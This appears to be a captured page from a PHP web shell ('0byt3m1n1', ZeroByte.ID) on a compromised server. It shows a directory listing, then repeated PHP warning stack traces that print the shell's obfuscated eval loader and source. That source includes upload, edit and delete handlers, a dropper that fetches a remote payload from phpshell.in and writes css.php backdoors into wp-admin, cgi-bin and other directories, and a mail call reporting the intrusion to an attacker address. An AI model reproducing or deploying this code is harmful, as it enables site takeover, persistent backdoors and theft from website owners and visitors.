0byt3m1n1

Path: C:/Windows/SysWOW64/WindowsPowerShell/v1.0/Modules/NetSecurity/
[ Home ]

Name
Size
Permissions
Last Update
Options
[D] en
--
drwxrwxrwx
01-Jun-2025 23:12
[D] inc
--
drwxrwxrwx
01-Jun-2025 23:09
[F] Microsoft.Windows.Firewall.Commands.dll
32 KB
-rw-rw-rw-
29-Oct-2014 03:07
[F] NetFirewallAddressFilter.cmdletDefinition.cdxml
3.751 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetFirewallApplicationFilter.cmdletDefinition.cdxml
3.156 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetFirewallInterfaceFilter.cmdletDefinition.cdxml
2.974 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml
3.604 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetFirewallPortFilter.cmdletDefinition.cdxml
4.75 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetFirewallProfile.cmdletDefinition.cdxml
8.116 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetFirewallRule.cmdletDefinition.cdxml
30.549 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetFirewallSecurityFilter.cmdletDefinition.cdxml
5.424 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetFirewallServiceFilter.cmdletDefinition.cdxml
2.734 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetFirewallSetting.cmdletDefinition.cdxml
6.231 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetGPO.cmdletDefinition.cdxml
1.841 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetIPsecDospSetting.cmdletDefinition.cdxml
11.788 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetIPsecIdentity.cmdletDefinition.cdxml
1.311 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml
12.668 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetIPsecMainModeRule.cmdletDefinition.cdxml
16.346 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetIPsecMainModeSA.cmdletDefinition.cdxml
2.036 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetIPsecPhase1AuthSet.cmdletDefinition.cdxml
11.328 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetIPsecPhase2AuthSet.cmdletDefinition.cdxml
10.764 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetIPsecPolicyChange.cmdletDefinition.cdxml
0.678 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml
11.616 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetIPsecQuickModeSA.cmdletDefinition.cdxml
3.663 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetIPsecRule.cmdletDefinition.cdxml
38.323 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetSecurity.formats.ps1xml
131.982 KB
-rw-rw-rw-
21-Aug-2013 23:57
[F] NetSecurity.psd1
4.985 KB
-rw-rw-rw-
18-Jun-2013 12:26
[F] NetSecurity.types.ps1xml
72.256 KB
-rw-rw-rw-
21-Aug-2013 23:57

© 2017 - ZeroByte.ID.


( ! ) Warning: fopen(C:/wamp64/www/js/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 95
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.0846527896fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:95
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 96
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.0937540296fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:96
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 97
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.0969540296fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:97 not exitsdone .
( ! ) Warning: fopen(C:/wamp64/www/modules/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 105
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1169540296fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:105
